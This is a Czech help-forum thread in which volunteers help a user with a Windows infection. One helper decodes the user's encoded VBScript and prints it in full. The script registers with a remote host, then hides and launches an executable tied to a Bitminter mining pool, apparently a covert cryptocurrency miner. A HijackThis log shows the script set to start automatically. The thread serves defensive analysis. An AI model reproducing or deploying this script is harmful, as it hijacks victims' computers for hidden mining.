windows script host

[Uziv00]

Podle tohoto http://forum.viry.cz/viewtopic.php?f=13&t=131180 by mělo pomoci vrátit se do bodu obnovení, kdy se hláška ještě neobjevovala.
Jinak přípona vbe znamená, že skript byl zakódován pomocí Microsoft Script Encoder, takže v něm bohužel nic neobjevím. Možná by stálo za to projít registry a vyhledat ten příkaz, který to spouští a zkusit jej odstranit. To by ale měl potvrdit jaro3. Můžeš taky zkusit ten skript přejmenovat např. na ntvdm.old a zkusit co to udělá. Kdyby PC zlobil, tak přejmenovat zpět.

[Reklama]

[x.raver]

Dobrá, díky moc.
Ještě se zeptám, zda je z toho čitelné, jestli je to vir, který "jen" zpomaluje nebo jinak negativně ovlivňuje PC,
nebo bych se, než se to vyřeší, měl raději vyhnout věcem jako je internet banking či akcím na herních serverech,
kde mám real money...

[Uziv00]

Tak se mi to povedlo rozkódovat. Už samotný kód nevypadá na to, že ho psal někdo normálně, ale můžu se plést.
V první etapě si zjištuje cestu k adresáři windows a cestu k domovskému adresáři uživatele:

Kód: Vybrat vše

set shell=wScriPt.CreateObject("WScript.Shell")
wIndowSdIr=sheLl.ExpaNdenVIronmentStrIngs("%windir%")
hOmeDir=shell.expandEnvironmentstrings("%USERPROFILE%")
WscrIpt.echo hoMedIr

Zde je zajímavá chybka - příkaz wscript.echo zobrazí cestu k domovskému adresáři (nevím proč, možná nějaký zbytek po ladění?) - a to je právě ta hláška co se ti zobrazuje.

Ve druhé etapě kontroluje přítomnost knihovny OpenCL.dll. Nemám tušení k čemu slouží, snad kolegové pohohou. Když ji nenajde, tak se pravděpodobně (tím si nejsem 100% jistý) pokouší někam připojit a něco zřejmě stáhnout a zaregistrovat.

Kód: Vybrat vše

If objFSO.FIleexists(windowsdIr&"\system32\OpenCL.dll")Then
if Not oBjFSO.FilEExIsts(hOmedir&"\regbcm")THEn sEt objXmLhTTP=CreateObject("MSXML2.XMLHTTP")
objxMLhTtP.open"GET","http://msdrv64.com/register_slave.php",False
objXMLHttP.Send()
Set regFile=objFsO.CreaTeTextFile(homedIr&"\regbcm",TRue)
regFile.Close
End if

No a v dalším - kontroluje nějakou službu windows, zapisuje nějaké přihlašovací údaje do ntvdm.inf. Vytváří nějaký exe soubor ve windows\inf a snaží se jej spustit. Podle toho inf souboru se snaží spustit proces msrcoxht, který by se měl připojit na server tcp://mint.bitminter.com:3333 se jménem a heslem uvedeným opět v ntvdm.inf. Na víc mé znalosti bohužel nestačí. Ale třeba ti to něco řekne. Nebo někomu zde.

Kód: Vybrat vše

Set ObjwMIServiCe=GEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
sEt objstartup=oBjWMIServiCe.Get("Win32_ProcessStartup")
SEt objConFig=ObjSTArtup.SpawnInstaNce_
objConfiG.ShowWindOw=12
Set objProcESs=GetObjEcT("winmgmts:root\cimv2:Win32_Process")
Set objFSO=CreateObject("Scripting.FileSystemObject")
SeT lisTfile=objFSo.OpeNTexTFilE("c:\windows\inf\ntvdm.inf")
eXEcName=lIstFile.ReAdLine
urL=lIstFIle.ReadLine
login=listfile.ReadLine
PassWOrd=LisTFilE.ReadLine
path=winDowsdir&"\inf\"&execNAmE&"\"&exeCName&".exe -o "&url&" -u "&login&" -p "&passworD
errReturN=ObjProcess.CrEate(path,null,oBjconFig,iNTProcessID)

K tomu ještě dodám, že původní kód je tento:

Kód: Vybrat vše

Microsoft (R) Windows Script Host verze 5.7
Copyright (C) Microsoft Corporation 1996-2001. Vçechna pr va vyhrazena.

set shell=wScriPt.CreateObject("WScript.Shell"):wIndowSdIr=sheLl.ExpaNdenVIronmentStrIngs("%windir%"):hOmeDir=shell.expandEnvironmentstrings("%USERPROFILE%"):WscrIpt.echo hoMedIr:Set objFSO=CreateObject("Scripting.FileSystemObject"):If objFSO.FIleexists(windowsdIr&"\system32\OpenCL.dll")Then if Not oBjFSO.FilEExIsts(hOmedir&"\regbcm")THEn sEt objXmLhTTP=CreateObject("MSXML2.XMLHTTP"):objxMLhTtP.open"GET","http://msdrv64.com/register_slave.php",false:objXMLHttP.Send():Set regFile=objFsO.CreaTeTextFile(homedIr&"\regbcm",TRue):regFile.Close:End if:Set ObjwMIServiCe=GEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):sEt objstartup=oBjWMIServiCe.Get("Win32_ProcessStartup"):SEt objConFig=ObjSTArtup.SpawnInstaNce_:objConfiG.ShowWindOw=12:Set objProcESs=GetObjEcT("winmgmts:root\cimv2:Win32_Process"):Set objFSO=CreateObject("Scripting.FileSystemObject"):SeT lisTfile=objFSo.OpeNTexTFilE("c:\windows\inf\ntvdm.inf"):eXEcName=lIstFile.ReAdLine:urL=lIstFIle.ReadLine:login=listfile.ReAdLiNe:PassWOrd=LisTFilE.ReaDLine:path=winDowsdir&"\inf\"&execNAmE&"\"&exeCName&".exe -o "&url&" -u "&login&" -p "&passworD:errReturN=ObjProcess.CrEate(path,null,oBjconFig,iNTProcessID):End If


Tedy kód je napsán na jednom řádku a příkazy jsou odděleny dvojtečkou, což se taky zrovna moc neužívá.

[x.raver]

to ITCrowd: diky za tvuj cas, dal tedy budu pokracovat s jaro3

to jaro3:
dal jsem na make read only, po restartu hlaska znovu vyskocila
novy log HiJacku:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 13:13:47, on 4.7.2013
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Acer\Empowering Technology\ePerformance\MemCheck.exe
C:\Acer\LANScope Agent\awServ.exe
C:\Program Files\Java\jre7\bin\jqs.exe
c:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Polar\Daemon\polard.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\system32\SysMonitor.exe
C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
C:\Acer\LANScope Agent\awtray.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Acer\Empowering Technology\Acer.Empowering.Framework.Launcher.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
C:\Acer\Empowering Technology\eLock\Monitor\LockMon.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\internet explorer\iexplore.exe
c:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O3 - Toolbar: Acer eDataSecurity Management - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll
O4 - HKLM\..\Run: [LaunchApp] Alaunch
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [ntiMUI] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [Acer Empowering Technology Monitor] C:\WINDOWS\system32\SysMonitor.exe
O4 - HKLM\..\Run: [eDataSecurity Loader] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe 0
O4 - HKLM\..\Run: [eLockMonitor] C:\Acer\Empowering Technology\eLock\Monitor\LaunchMonitor.exe
O4 - HKLM\..\Run: [eRecoveryService] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
O4 - HKLM\..\Run: [WarReg_PopUp] C:\Acer\WR_PopUp\WarReg_PopUp.exe /normal-run2
O4 - HKLM\..\Run: [AdminWorks Tray] "C:\Acer\LANScope Agent\awtray.exe"
O4 - HKLM\..\Run: [MSC] "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [NtVdmSrv] C:\WINDOWS\inf\ntvdm.vbe
O4 - HKLM\..\Run: [Printsrv] c:\Windows\System32\Printing_Admin_Scripts\en-US\pubpr.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Acer Empowering Technology.lnk = ?
O4 - Global Startup: Acer WLAN 11g USB Dongle.lnk = C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
O4 - Global Startup: Polar WebSync.lnk = C:\Program Files\Polar\WebSync\WebSync.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre7\bin\jp2iexp.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre7\bin\jp2iexp.dll
O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microso ... 2827612046
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Proces mezipaměti kategorií součástí - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Memory Check Service (AcerMemUsageCheckService) - Acer Inc. - C:\Acer\Empowering Technology\ePerformance\MemCheck.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: AdminWorks Agent X6 (AWService) - OSA Technologies Inc., An Avocent Company - C:\Acer\LANScope Agent\awServ.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - c:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: Polar Daemon - Unknown owner - C:\Program Files\Polar\Daemon\polard.exe

--
End of file - 7282 bytes

[jaro3]

Stáhni si OTL by OldTimer
na plochu. Ujisti se , že máš zavřena všechna ostatní okna a poklepej na ikonu OTL.Nahoře v okně pod Výstup klikni na minimální výstup.Pod Běžné registry změň na Vše. Zatrhni Kontrola na havěť “LOP“ a Kontrola na havěť “ Purity“ . Klikni na Prohledat. Všechny ostatní nastavení ponech jak jsou. Sken může trvat dlouho, až skončí otevřou se dva logy:
OTL.Txt
Extras.Txt
Jsou uloženy ve stejném místě jako OTL. Oba logy sem prosím zkopíruj.